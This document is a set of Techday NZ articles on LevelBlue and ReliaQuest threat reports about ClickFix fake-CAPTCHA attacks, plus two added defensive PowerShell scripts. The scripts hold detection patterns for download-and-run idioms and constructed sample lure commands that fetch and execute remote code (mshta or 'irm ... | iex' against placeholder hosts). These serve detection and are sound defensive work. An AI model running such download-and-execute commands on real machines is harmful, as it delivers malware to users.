
LevelBlue warns cyber incidents jump as social engineering rises
Techday NZ, 30-07-2025
LevelBlue has released its latest Threat Trends Report, revealing significant changes in cyberattack patterns and a marked increase in incident rates during the first half of 2025.
Incident rates rise
The report, analysing data from January through May 2025, shows that the percentage of LevelBlue customers experiencing cybersecurity incidents surged from 6% in the second half of 2024 to 17% in 2025. This threefold increase highlights escalating risks to organisations across various sectors.
The report attributes this sharp rise in part to evolving tactics employed by cybercriminals. While Business Email Compromise (BEC) continues to be the most frequent method for gaining initial access to systems, there has been notable growth in alternative approaches. Non-BEC incidents increased by 214%, indicating that attackers are diversifying their methods to infiltrate networks.
Faster breakout times
LevelBlue's findings indicate that once attackers penetrate a network, they are moving laterally inside these environments at unprecedented speeds. The average breakout time (the duration between initial access and lateral movement) has now dropped to under 60 minutes, with certain cases recorded at less than 15 minutes.
Social engineering surge
The report points to a considerable surge in social engineering attacks, with 39% of initial access incidents linked to these techniques. This trend is particularly evident in the prevalence of fake CAPTCHA-based attacks, such as ClickFix campaigns. These campaigns, designed to trick users into providing credentials or executing malware, saw an increase of 1,450% from the second half of 2024 to the first half of 2025.
"A striking development in the first half of 2025 is how much more sophisticated threat actors have become at deception. They're moving beyond traditional BEC schemes and using targeted social engineering to manipulate users into opening the door. Once inside, they're deploying remote access trojans and quickly covering their tracks, allowing them to move laterally through networks with alarming speed. This isn't a one-off trend – we fully expect this shift to continue throughout 2026."
This detailed assessment comes from Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue, underscoring a consistent and increasing sophistication in attackers' use of deception as part of their strategies.
Recommendations for defence
In response to these trends, LevelBlue has set out several recommendations for organisations seeking to bolster their cyber defences. These include raising awareness among users about threats posed by fake CAPTCHA attacks and other browser-based vectors, and considering restrictions on PowerShell or command prompt use for non-administrator accounts.
The report suggests that firms develop and enforce caller verification protocols, such as multi-factor authentication (MFA), code words or phrases, or the use of identity verification platforms. It also advises mandatory implementation of MFA and digital certificates for VPN access, as well as deployment of jump boxes for remote desktop access from outside organisational networks.
Another recommendation is the removal of Quick Assist from all end-user machines unless there is a specific business requirement, alongside following established guidelines to prevent the unauthorised download and execution of remote monitoring and management (RMM) software. The report notes that in help desk-themed attacks, threat actors may leverage other tools if Quick Assist is unavailable.
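The Quick Assist and fake-CAPTCHA recommendations above, as an added PowerShell audit script that is not code from the LevelBlue report: it removes the Quick Assist capability when asked, and lists the commands the current user has typed into Win+R (Explorer's RunMRU key), which is where a pasted ClickFix one-liner leaves a trace. It assumes Windows 10/11 with the DISM PowerShell module and an elevated session; the pattern list is a constructed heuristic, not a detection rule from the report.

```powershell
# Added example, not from the LevelBlue report. Run in an elevated session.
param(
    [switch]$RemoveQuickAssist   # audit only unless this switch is given
)

# --- 1. Quick Assist ships as a Windows capability; remove it unless a business need exists.
$caps = Get-WindowsCapability -Online -Name 'App.Support.QuickAssist*'
foreach ($cap in $caps) {
    if ($cap.State -eq 'Installed') {
        Write-Warning "Quick Assist is installed: $($cap.Name)"
        if ($RemoveQuickAssist) {
            Remove-WindowsCapability -Online -Name $cap.Name | Out-Null
            Write-Output "Removed $($cap.Name)"
        }
    }
    else {
        Write-Output "$($cap.Name): $($cap.State)"
    }
}

# --- 2. ClickFix trace: Explorer records every command typed into Win+R under RunMRU.
# Entries are letter-named values whose data ends in "\1"; MRUList holds their order.
# RunMRU is per user, so on shared machines sweep each loaded hive under HKU: as well.
$runMru  = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
# Constructed heuristic: LOLBins and download-and-run idioms typical of fake-CAPTCHA lures.
$suspect = 'mshta|powershell|pwsh|cmd(\.exe)?\s|curl\s|\biex\b|\birm\b|invoke-|downloadstring|-enc|https?://'

if (Test-Path $runMru) {
    $props = Get-ItemProperty -Path $runMru
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -notmatch '^[a-z]$') { continue }   # skip MRUList and PS* metadata
        $cmd = ([string]$p.Value) -replace '\\1$', ''   # strip the trailing "\1" marker
        if ($cmd -match $suspect) {
            Write-Warning "RunMRU[$($p.Name)] looks like a pasted command: $cmd"
        }
        else {
            Write-Output "RunMRU[$($p.Name)]: $cmd"
        }
    }
}
else {
    Write-Output 'No RunMRU key: this user has not used Win+R.'
}
```

Without the switch the script only reports; pass -RemoveQuickAssist once the business-need check in the recommendation has been made.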
Patch management also features prominently among suggested actions. Organisations are reminded to remain vigilant regarding vulnerabilities and to install updates promptly - especially where proof-of-concept exploits have been publicly released.
Working together on cyber threats
The LevelBlue Security Operations Centre collaborates closely with LevelBlue Labs researchers to monitor evolving threats and develop effective countermeasures. This teamwork involves sharing intelligence and methodologies as well as joint research projects, with the aim of strengthening defences across client organisations.
The LevelBlue Threat Trends Report is intended to provide organisations with clear insight into current cyber threat landscapes and practical steps to reduce exposure to increasing and more sophisticated attacks.

Related Articles
Techday NZ, 04-07-2025
LevelBlue acquires Trustwave to form largest global MSSP
LevelBlue has entered into an agreement to acquire Trustwave, expanding its capabilities in managed security services and managed detection and response. The acquisition of Trustwave from MC2 Security Fund is expected to create the world's largest independent, pure-play managed security services provider. This move closely follows LevelBlue's recent agreement to purchase Aon's cybersecurity consulting business, further consolidating its position in the cyber defence sector.
Expanded capabilities
Trustwave's Fusion Platform and cloud-native MDR service will be integrated into LevelBlue's offering. The merger aims to deliver 24/7 cybersecurity protection across global markets, enhancing visibility and control over security operations for organisations of varying scales. The combined portfolio is anticipated to create a strategically unified managed defence platform. It will leverage LevelBlue's artificial intelligence-driven threat detection capabilities and Trustwave's SpiderLabs unit for threat research and intelligence. The joint offering targets organisations operating across cloud, hybrid, and on-premises environments. Trustwave recently achieved full authorised status from the US Federal Risk and Authorization Management Program (FedRAMP) and StateRAMP, which will enable LevelBlue to meet requirements for US federal and state projects, including those with stringent security demands such as the Department of Defense and Cybersecurity Maturity Model Certification (CMMC).
"The acquisition of Trustwave represents a pivotal moment for LevelBlue and the cybersecurity industry," said Robert McCullen, Chairman and CEO of LevelBlue. "Trustwave's extensive expertise in managed detection and response services, combined with its unparalleled threat intelligence from SpiderLabs and mission-critical FedRAMP and StateRAMP authorizations, perfectly aligns with our vision to deliver simplified and powerful cybersecurity protection to organisations. This strategic move reflects our commitment to delivering better cybersecurity outcomes to our customers and enhances our global go-to-market capabilities, as well as in the U.S. federal, state, and local government markets."
Eric Harmon, Chief Executive Officer of Trustwave, said, "We're thrilled to partner with LevelBlue to drive our next phase of growth and unlock even greater cyber value for our clients. The threat landscape continues to evolve at an increasingly rapid pace. This announcement reinforces Trustwave's market leadership, and together with LevelBlue, positions us to further strengthen our combined leadership position, bolster our offensive and defensive security portfolio, and drive additional innovation to further safeguard and fortify our clients against disruptive and damaging cyber threats."
Market response
Trustwave, headquartered in Chicago and operating globally, employs over 1,000 security professionals. It is recognised as an industry leader in managed detection and response, managed security services, cybersecurity advisory, penetration testing, database, and email security. Its SpiderLabs team contributes threat research and intelligence, integrated into its product and service suite.
Market analysts noted the significance of the deal, particularly in light of recent consolidations in the managed security sector. Christina Richmond, Principal Analyst at Richmond Advisory Group, stated, "Two longtime leaders in MSS and MDR coming together signals market maturation and industry consolidation, but also a powerhouse opportunity. Trustwave's SpiderLabs team and Fusion platform integrated with LevelBlue's threat intelligence and machine learning capabilities, backed by the Open Threat Exchange (OTX), will enhance threat detection and response on a cloud-based platform. Add in the recently announced acquisition of Aon's Cybersecurity and Intellectual Property Litigation consulting groups, and the potential for a full-service global cybersecurity and risk management firm is apparent."
Strategic impact
The acquisition fits into LevelBlue's broader approach of merging complementary organisations to build a stronger, more integrated offering for clients, specifically addressing increased demand for comprehensive managed cybersecurity solutions. Bringing together the two companies will position LevelBlue as the largest independent, pure-play MSSP globally.
Chad Sweet, Chairman of Trustwave and Co-Founder of The Chertoff Group / MC2, expressed support for the acquisition. "Joining forces with LevelBlue marks an exciting new chapter for Trustwave and our clients. The combination of LevelBlue's AI threat detection and Trustwave's FedRAMP and StateRAMP authorized Fusion Intelligent Security Operations Platform enables leading-edge cybersecurity protection for enterprises and government clients."
Shawn Hakl, Head of AT&T Business Products, commented on the significance of the certification aspects. "FedRAMP and StateRAMP certified managed detection and response capabilities are an exciting expansion to LevelBlue's managed security services. This business combination positions LevelBlue as a strategic provider of cybersecurity services in AT&T's portfolio, especially to our valued federal customers."
Financial advice for LevelBlue was provided by Santander, with legal counsel from Kirkland & Ellis. Trustwave's advisors included Guggenheim Securities and Pillsbury Winthrop Shaw Pittman. Strategic advice will be provided by The Chertoff Group to help accelerate growth in the managed detection and response market segment. The financial terms of the deal were not disclosed, and the acquisition remains subject to customary closing conditions.


Techday NZ, 19-06-2025
ReliaQuest report exposes rise of social engineering cyber threats
ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base.
ClickFix and social engineering tactics
One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease. This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics."
Lateral movement and initial access trends
Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report sees a shift, as attackers increasingly rely on user manipulation rather than exploiting technical vulnerabilities. ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems."
Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors.
MSHTA on the rise for defence evasion
MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake. "ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details.
Changes in ransomware operations
The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also reported increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders."
Impact on industry sectors
The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware Cleo campaign.
Malware trends and threat actor activity
The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces. "Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments.
Emergence of Scattered Spider
Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is identified for using detailed social engineering against high-value individuals such as CFOs and utilising both on-premises methods and cloud techniques for stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack."
Recommendations and defensive measures
ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts. Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed. The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.
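The MSHTA defence-evasion figures and the "disable Windows Run" recommendation above, as an added PowerShell example that is not part of the ReliaQuest report: a detection function that flags the ClickFix process chain (Explorer as parent, a script host as child, a URL or download-and-run idiom on the command line) over four constructed process-creation records shaped like Sysmon Event ID 1 fields, followed by the per-user policy value behind "Remove Run menu from Start Menu". The field names, sample paths and the pattern list are assumptions.

```powershell
# Added example, not from the ReliaQuest report. The records below are constructed samples.
param(
    [switch]$ApplyNoRun   # only write the Run-dialog policy when asked
)

# ClickFix chain: the user pastes into Win+R, so explorer.exe is the parent of the script host,
# and the command line carries a URL or a download-and-execute idiom.
$launchers = 'mshta.exe', 'powershell.exe', 'pwsh.exe', 'cmd.exe'
$payload   = 'https?://|\biex\b|\birm\b|invoke-expression|downloadstring|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden'

function Test-ClickFixEvent {
    param([pscustomobject]$Event)   # expects ParentImage, Image, CommandLine
    $parent = [IO.Path]::GetFileName($Event.ParentImage).ToLower()
    $image  = [IO.Path]::GetFileName($Event.Image).ToLower()
    if ($parent -ne 'explorer.exe') { return $false }   # Win+R and the Start menu run under Explorer
    if ($image -notin $launchers)   { return $false }
    return [bool]($Event.CommandLine -match $payload)
}

$samples = @(
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'mshta https://example.invalid/verify' }     # constructed lure
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell -w hidden -c "irm https://example.invalid/a | iex"' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\notepad.exe'
                       CommandLine = 'notepad.exe notes.txt' }                    # benign Run usage
    [pscustomobject]@{ ParentImage = 'C:\Program Files\PowerShell\7\pwsh.exe'
                       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell -File C:\scripts\backup.ps1' }    # admin script, not Explorer
)
foreach ($e in $samples) {
    $flag = if (Test-ClickFixEvent $e) { 'SUSPECT' } else { 'ok' }
    Write-Output ('{0,-7} {1} <- {2}: {3}' -f $flag, $e.Image, $e.ParentImage, $e.CommandLine)
}

# Mitigation from the report: take the Run dialog away from non-administrative users.
# Deploy through GPO (User Configuration > Administrative Templates > Start Menu and Taskbar >
# "Remove Run menu from Start Menu"); the registry value it sets per user is NoRun = 1.
# Writing it to HKCU here only affects the account running the script.
if ($ApplyNoRun) {
    $policy = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
    if (-not (Test-Path $policy)) { New-Item -Path $policy -Force | Out-Null }
    Set-ItemProperty -Path $policy -Name 'NoRun' -Value 1 -Type DWord
    Write-Output 'NoRun policy set for the current user; sign out to apply.'
}
```

The first two samples are flagged and the last two are not; the same function can be pointed at real Sysmon or Security 4688 events once their fields are mapped to ParentImage, Image and CommandLine.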